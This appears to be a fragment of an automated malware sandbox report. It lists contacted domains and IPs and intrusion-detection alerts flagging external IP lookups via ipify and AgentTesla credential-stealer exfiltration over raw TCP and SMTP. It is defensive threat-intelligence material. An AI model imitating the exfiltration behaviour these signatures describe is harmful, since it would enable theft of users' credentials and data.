  • smtp.bluegatehomecares.com → 208.91.199.224, 208.91.199.225, 208.91.198.143, 208.91.199.223 (unknown)
  • self.events.data.microsoft.com → 52.182.143.214 (whitelisted)

Threats (class: message)

  • Misc activity: ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
  • Potential Corporate Privacy Violation: ET POLICY Possible IP Check api.ipify.org
  • Misc activity: ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
  • A Network Trojan was detected: STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
  • A Network Trojan was detected: ET MALWARE AgentTesla Exfil Via SMTP
  • Misc activity: INFO [ANY.RUN] SMTP email client opens transfer with server (EHLO)

3 ETPRO signatures available in the full report